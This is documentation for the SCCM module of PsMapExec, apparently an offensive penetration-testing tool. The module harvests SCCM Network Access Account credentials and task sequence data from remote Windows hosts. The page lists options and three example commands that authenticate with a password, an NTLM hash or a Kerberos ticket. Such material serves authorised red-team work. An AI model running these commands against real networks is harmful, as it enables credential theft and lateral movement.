SCCM

Dumps local SCCM secrets for Network Access Account credentials and Task sequence data. Collected information is automatically parsed and organized where it will be stored in $PWD\PME\SCCM\.

Uses a stripped down and revised version of SharpSCCM for execution.

Supported Methods

  • SMB

  • SessionHunter

  • WMI

  • WinRM

Optional Parameters

Parameter
Value
Description

-NoParse

N/A

Will ommit parsing output from each system.

-ShowOutput

N/A

Displays each targets output to the console

-SuccessOnly

N/A

Display only successful results

Usage Examples

# SMB execution with password authentication, targeting workstations
PsMapExec SMB -Targets "Workstations" -Username [User] -Password [Pass] -Module SCCM

# WinRM execution with hash authentication, targeting servers
PsMapExec WinRM -Targets "Servers" -Username [User] -Hash [Hash] -Module SCCM

# WMI execution with Kerberos ticket authentication (Username not required)
PsMapExec WMI -Targets "All" -Ticket [doI..] -Module SCCM

Last updated

Was this helpful?